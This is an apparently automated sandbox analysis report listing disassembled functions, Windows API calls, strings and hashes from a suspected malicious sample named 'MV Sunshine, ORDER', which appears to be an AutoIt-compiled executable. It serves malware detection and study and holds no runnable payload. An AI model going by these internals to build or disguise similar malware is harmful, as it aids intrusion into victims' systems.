Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 76446d584b6ee65d9139746da5a5ac5fc45347152574915687c448cb4362afcd
Instruction ID: 916235049a34ac7e288c7c26ec12c5b4dd7296b5bf7bb6d42d554953f94ae985
Opcode Fuzzy Hash: 76446d584b6ee65d9139746da5a5ac5fc45347152574915687c448cb4362afcd
Instruction Fuzzy Hash: 9B915BB42043059FCB14EF24D491B6AB7A1BF89354F04886DF9965B3A2DB31ED4ACB81

Function 00A0BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A0BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00A06D80,?), ref: 00A0BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A0BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A0BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A0BC7D
FreeLibrary.KERNEL32(?), ref: 00A0BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A0BC99
DestroyIcon.USER32(?), ref: 00A0BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A0BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A0BCD1

Part of subcall function 009A313D: __wcsicmp_l.LIBCMT ref: 009A31C6

Strings

.icl, xrefs: 00A0BAE4
.exe, xrefs: 00A0BB04
.dll, xrefs: 00A0BB27

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 752f88d2a7e1cd5c0a8f399c385624cfd97886cade2f0183df5e30f72c7e3af7
Instruction ID: f8bab0cdc6d4b1e106a42b26026f94117fedaa3ddf2d07d907a7d96e478eac77
Opcode Fuzzy Hash: 752f88d2a7e1cd5c0a8f399c385624cfd97886cade2f0183df5e30f72c7e3af7
Instruction Fuzzy Hash: 3C61EE71A10219BFEB24DF64DD85FBE77A8FB09710F204619F915E61C0DB74AA81CBA0

Function 009EA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

CharLowerBuffW.USER32(?,?), ref: 009EA636
GetDriveTypeW.KERNEL32 ref: 009EA683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA730

Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66

Strings

set cd door , xrefs: 009EA6D1
close cd wait, xrefs: 009EA71B
wait, xrefs: 009EA6ED
type cdaudio alias cd wait, xrefs: 009EA6AE
open , xrefs: 009EA692
close, xrefs: 009EA63C
closed, xrefs: 009EA64A, 009EA653
open, xrefs: 009EA65D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: da59c731997926a7e0a63b1f2a734466c278e866d5ce699f570e15ce2d0cad61
Instruction ID: d77be6e942b6588734a4d5cf0172e199e2c8f96ebc3bf6ac9e51f296be5b0bdc
Opcode Fuzzy Hash: da59c731997926a7e0a63b1f2a734466c278e866d5ce699f570e15ce2d0cad61
Instruction Fuzzy Hash: 8A5138751043449FC704EF21C981A6AB7E8FF98718F14496CF896973A1DB31EE0ACB92

Function 009EA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009EA47A
__swprintf.LIBCMT ref: 009EA49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 009EA4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009EA4FE
_memset.LIBCMT ref: 009EA51D
_wcsncpy.LIBCMT ref: 009EA559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009EA58E
CloseHandle.KERNEL32(00000000), ref: 009EA599
RemoveDirectoryW.KERNEL32(?), ref: 009EA5A2
CloseHandle.KERNEL32(00000000), ref: 009EA5AC

Strings

\, xrefs: 009EA4B2
:, xrefs: 009EA4BD
\??\%s, xrefs: 009EA496

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 69e1332b1e575e58348a06acab5db1cbc97ef0feb3f34f7a336dd51b196c437f
Instruction ID: c2116a5d768d6021c1b0a3623cd2be5758f20e6a1e2d84ecf067e6f6447c5f61
Opcode Fuzzy Hash: 69e1332b1e575e58348a06acab5db1cbc97ef0feb3f34f7a336dd51b196c437f
Instruction Fuzzy Hash: 4131D271900259ABDB21DFA1DC48FEF37BCEF88700F1040B6FA08D6060EB709A458B25

Function 009BAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 009BAB7B
___wtomb_environ.LIBCMT ref: 009BAB9D

Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68

__malloc_crt.LIBCMT ref: 009BABC5
__malloc_crt.LIBCMT ref: 009BABE2
_free.LIBCMT ref: 009BAC19
__recalloc_crt.LIBCMT ref: 009BAC52
__recalloc_crt.LIBCMT ref: 009BAC97
_strlen.LIBCMT ref: 009BACC3
__calloc_crt.LIBCMT ref: 009BACCD
_strlen.LIBCMT ref: 009BACDC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 009BAD0A
_free.LIBCMT ref: 009BAD24
_free.LIBCMT ref: 009BAD31
_free.LIBCMT ref: 009BAD43
__invoke_watson.LIBCMT ref: 009BAD5D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 4ee4eb134f8175181e63d29936a4adad63703a5037766fb8439dc922e4828818
Instruction ID: bcf3f9ebfbdbb3f182c78f1d34d5f83a23fd0a8e80f52989443c59d75ac5b93c
Opcode Fuzzy Hash: 4ee4eb134f8175181e63d29936a4adad63703a5037766fb8439dc922e4828818
Instruction Fuzzy Hash: D8612972900315EFDB209F68DE42BEA7BA9EF96332F104229E8159B1D1DB35CC41C792

Function 009EDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 009EDC7B
_wcscat.LIBCMT ref: 009EDC93
_wcscat.LIBCMT ref: 009EDCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009EDCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 009EDCCE
GetFileAttributesW.KERNEL32(?), ref: 009EDCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 009EDD00
SetCurrentDirectoryW.KERNEL32(?), ref: 009EDD12

Strings

*.*, xrefs: 009EDD51

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 3b07df2851a70cdd36e94e53a23e937cdfd875a916141dc279ebac4ee0e80d29
Instruction ID: 61afcb232f6e50ecec388da0c930e36a4b169a7e7f48cbe46c5c9796ec3c3c66
Opcode Fuzzy Hash: 3b07df2851a70cdd36e94e53a23e937cdfd875a916141dc279ebac4ee0e80d29
Instruction Fuzzy Hash: 9D81A2715052859FCB25EF25C885AAAB7E8BF88350F198C2EF889C7250E734DD45CB52

Function 00A0C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A0C4EC
GetFocus.USER32 ref: 00A0C4FC
GetDlgCtrlID.USER32(00000000), ref: 00A0C507
_memset.LIBCMT ref: 00A0C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A0C65D
GetMenuItemCount.USER32(?), ref: 00A0C67D
GetMenuItemID.USER32(?,00000000), ref: 00A0C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A0C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A0C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A0C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A0C779

Strings

0, xrefs: 00A0C62A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 3d0bf4f1fd7c671384ecd6aff891f70c7a3e3512fa78080e2799b1c389a718c0
Instruction ID: dc6ef9781f9c87d9317b15a5c8e9c4d2e4777bfb52f42459bf9cab7be43f7111
Opcode Fuzzy Hash: 3d0bf4f1fd7c671384ecd6aff891f70c7a3e3512fa78080e2799b1c389a718c0
Instruction Fuzzy Hash: 4881BF746083199FD720CF14E984A6BBBE8FF89324F00062DF99593291D771E906CFA2

Function 009D83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D8766
Part of subcall function 009D874A: GetLastError.KERNEL32(?,009D822A,?,?,?), ref: 009D8770
Part of subcall function 009D874A: GetProcessHeap.KERNEL32(00000008,?,?,009D822A,?,?,?), ref: 009D877F
Part of subcall function 009D874A: HeapAlloc.KERNEL32(00000000,?,009D822A,?,?,?), ref: 009D8786
Part of subcall function 009D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D879D

Part of subcall function 009D87E7: GetProcessHeap.KERNEL32(00000008,009D8240,00000000,00000000,?,009D8240,?), ref: 009D87F3
Part of subcall function 009D87E7: HeapAlloc.KERNEL32(00000000,?,009D8240,?), ref: 009D87FA
Part of subcall function 009D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009D8240,?), ref: 009D880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009D8458
_memset.LIBCMT ref: 009D846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009D848C
GetLengthSid.ADVAPI32(?), ref: 009D849D
GetAce.ADVAPI32(?,00000000,?), ref: 009D84DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009D84F6
GetLengthSid.ADVAPI32(?), ref: 009D8513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009D8522
HeapAlloc.KERNEL32(00000000), ref: 009D8529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 009D854A
CopySid.ADVAPI32(00000000), ref: 009D8551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009D8582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009D85A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009D85BC

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 389be82a96e3c2c0a3bda619e77edf6b7454fccaed344f9321daf8c40f9de248
Instruction ID: f9863996c5e84c1c6ac049ab96f5249258253e2e3e7c1faec849654f8d6002af
Opcode Fuzzy Hash: 389be82a96e3c2c0a3bda619e77edf6b7454fccaed344f9321daf8c40f9de248
Instruction Fuzzy Hash: 02615E71940209AFDF10DF95DC45AEEBBB9FF04310F0481AAF915A7292DB319A06CF60

Function 009F762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009F76A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009F76AE
CreateCompatibleDC.GDI32(?), ref: 009F76BA
SelectObject.GDI32(00000000,?), ref: 009F76C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 009F771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 009F7757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 009F777B
SelectObject.GDI32(00000006,?), ref: 009F7783
DeleteObject.GDI32(?), ref: 009F778C
DeleteDC.GDI32(00000006), ref: 009F7793
ReleaseDC.USER32(00000000,?), ref: 009F779E

Strings

(, xrefs: 009F7723

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: b1e2fe6bce51e76e83db498b6551463c3819e31923cfd5c4c105391285887c4b
Instruction ID: cde3b4edf8b7d4504d8cbb4c0fde664fc5ad9a05b6c998adf6098e720cd9452b
Opcode Fuzzy Hash: b1e2fe6bce51e76e83db498b6551463c3819e31923cfd5c4c105391285887c4b
Instruction Fuzzy Hash: E7515A75904309EFCB25CFA8DC84EAEBBB9EF48310F14852DFA49A7210D731A841CB60

Function 009EA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00A0FB78), ref: 009EA0FC

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 009EA11E
__swprintf.LIBCMT ref: 009EA177
__swprintf.LIBCMT ref: 009EA190
_wprintf.LIBCMT ref: 009EA246
_wprintf.LIBCMT ref: 009EA264

Strings

^ ERROR, xrefs: 009EA1E8
Line %d (File "%s"):, xrefs: 009EA171, 009EA18A
Error: , xrefs: 009EA20E
"%s" (%d) : ==> %s:, xrefs: 009EA25F
"%s" (%d) : ==> %s:%s%s, xrefs: 009EA241

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 909d8a4848e2386f81a4978ba54c5259fd52d06ec70665d6a3cef46e298912fe
Instruction ID: 70cf5c335d71da5404f4a7d8e423c0b428bbeba767fe632665e9101f5f8ec9ff
Opcode Fuzzy Hash: 909d8a4848e2386f81a4978ba54c5259fd52d06ec70665d6a3cef46e298912fe
Instruction Fuzzy Hash: 67517B71904209BBCF15FBE0CD86EEEB778AF45300F204565B515722A2EB31AF59CBA1

Function 00986BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 009A0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00986C6C,?,00008000), ref: 009A0BB7

Part of subcall function 009848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009848A1,?,?,009837C0,?), ref: 009848CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00986D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00986E5A

Part of subcall function 009859CD: _wcscpy.LIBCMT ref: 00985A05

Part of subcall function 009A387D: _iswctype.LIBCMT ref: 009A3885

Strings

Error opening the file, xrefs: 009BE866, 009BE8E1
AU3!, xrefs: 00986CC1
>>>AUTOIT SCRIPT<<<, xrefs: 009BE8BF
#include depth exceeded. Make sure there are no recursive includes, xrefs: 009BE84A
Unterminated string, xrefs: 009BEC0D
EA06, xrefs: 009BE87B
Bad directive syntax error, xrefs: 009BEBC6

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: db8d6d6d7669bb35927f2c8c7bee939d82066ec80c68bf517fab29157c36b48b
Instruction ID: 690338eb01d25fa2625c810abd020d17759e6dd0761166e3666bb1b59fc31763
Opcode Fuzzy Hash: db8d6d6d7669bb35927f2c8c7bee939d82066ec80c68bf517fab29157c36b48b
Instruction Fuzzy Hash: 870279311083419FC724EF24C991AAFBBE9BFD9354F14492DF48A972A2DB30D949CB42

Function 009845DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009845F9
GetMenuItemCount.USER32(00A46890), ref: 009BD7CD
GetMenuItemCount.USER32(00A46890), ref: 009BD87D
GetCursorPos.USER32(?), ref: 009BD8C1
SetForegroundWindow.USER32(00000000), ref: 009BD8CA
TrackPopupMenuEx.USER32(00A46890,00000000,?,00000000,00000000,00000000), ref: 009BD8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009BD8E9

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 742dbb223c0f368a253e4d968e5dba953188a10418739897810f9c413d7abc31
Instruction ID: ab9b337df44676c222e4e566f2e709c3fb2e75ba22cfd849da4e97079f91f466
Opcode Fuzzy Hash: 742dbb223c0f368a253e4d968e5dba953188a10418739897810f9c413d7abc31
Instruction Fuzzy Hash: 6871E47060221ABEEB319F65DC89FEABF69FF45364F200216F514A61E0DBB56C10DB90

Function 00A010A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A00038,?,?), ref: 00A010BC

Strings

HKCU, xrefs: 00A011AC
HKEY_CURRENT_CONFIG, xrefs: 00A01179
HKU, xrefs: 00A011CE
HKEY_CURRENT_USER, xrefs: 00A0119B
HKLM, xrefs: 00A0113A
HKCC, xrefs: 00A0118A
HKEY_LOCAL_MACHINE, xrefs: 00A01125
HKEY_USERS, xrefs: 00A011BD
HKEY_CLASSES_ROOT, xrefs: 00A0114F
HKCR, xrefs: 00A01164

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 79561443aec26efc3dda6d992bb000748e610a46678227b1fd82a96f0c3fba6e
Instruction ID: f563a0130191a0454c4888f36efb32d185e7b68ac860267f7a2ea18b6479a2c0
Opcode Fuzzy Hash: 79561443aec26efc3dda6d992bb000748e610a46678227b1fd82a96f0c3fba6e
Instruction Fuzzy Hash: 0B416C7115034E8BCF14EF90E991AEA3725BFAA340F104568FD955B2D2DB30AD1ACBA0

Function 009DFCB1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009BE6C9,00000010,?,Bad directive syntax error,00A0F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009DFCD2
LoadStringW.USER32(00000000,?,009BE6C9,00000010), ref: 009DFCD9

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

_wprintf.LIBCMT ref: 009DFD0C
__swprintf.LIBCMT ref: 009DFD2E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009DFD9D

Strings

Line %d:, xrefs: 009DFD28
Error: , xrefs: 009DFD6B
., xrefs: 009DFD83
Line %d (File "%s"):, xrefs: 009DFD43
%s (%d) : ==> %s.: %s %s, xrefs: 009DFD07

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

